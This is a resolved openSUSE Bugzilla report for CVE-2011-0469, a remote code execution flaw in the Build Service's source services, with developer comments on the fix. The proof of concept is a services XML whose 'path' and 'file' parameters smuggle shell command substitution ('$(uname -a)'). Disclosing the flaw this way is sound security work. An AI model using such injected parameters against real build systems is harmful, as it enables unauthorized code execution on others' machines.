Bug 679325 - (CVE-2011-0469) VUL-0: CVE-2011-0469: openSUSE Build Service: remote code execution
(CVE-2011-0469)
VUL-0: CVE-2011-0469: openSUSE Build Service: remote code execution
Status: RESOLVED FIXED
Classification: openSUSE
Product: openSUSE.org
Classification: openSUSE
Component: BuildService
unspecified
Other Other
: P2 - High : Major (vote)
: ---
Assigned To: Adrian Schröter
Adrian Schröter
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2011-03-14 10:50 UTC by Matthias Weckbecker
Modified: 2017-08-02 15:58 UTC (History)
2 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Matthias Weckbecker 2011-03-14 10:50:33 UTC
Adrian, as discussed last week the service-code contains various remote code execution vulnerabilities which allow attackers to execute arbitrary code on build systems with nobody-privileges. 

Ludwig suggested to open a bug for the issue in order to keep it tracked.

POC:

Add the following service to your project to get access to a machine w/ internet connectivity:

 <services>
  <service name="download_url">
    <param name="protocol">ftp</param>
    <param name="host">cpan.myclash.net</param>
    <param name="path">$(uname -a; exit 0)</param>
  </service>
  <service name="verify_file">
    <param name="file">$(uname -a)</param>
    <param name="verifier">md5</param>
    <param name="checksum">645ea983242177e446d68905cb5ecda5</param>
  </service>
 </services>
Comment 1 Ludwig Nussel 2011-03-14 10:59:31 UTC
use CVE-2011-0469
Comment 2 Christian Dengler 2011-03-14 11:28:10 UTC
The first script, I found this issue in, is fixed now (sr 64070).

But the other services, especially with network connection, contain a higher risk.
Comment 3 Adrian Schröter 2011-03-14 11:31:33 UTC
This was only possible when using the "experimental lxc wrapper for additional security ;)". This is fixed now. I will include the fix in next 2.1 release, but I have some serious doubts that anyone else ever used the LXC wrapper (because it is quite tricky to get it working anyway).
Comment 4 Adrian Schröter 2011-03-14 11:33:19 UTC
Comment 2: The problem was not the particular service, it was buggy, but safe. The problem was the lxc wrapper script (only used on server side so far).
Comment 6 Marcus Meissner 2017-08-02 15:58:24 UTC
no official announcemnet on openbuildservice.org.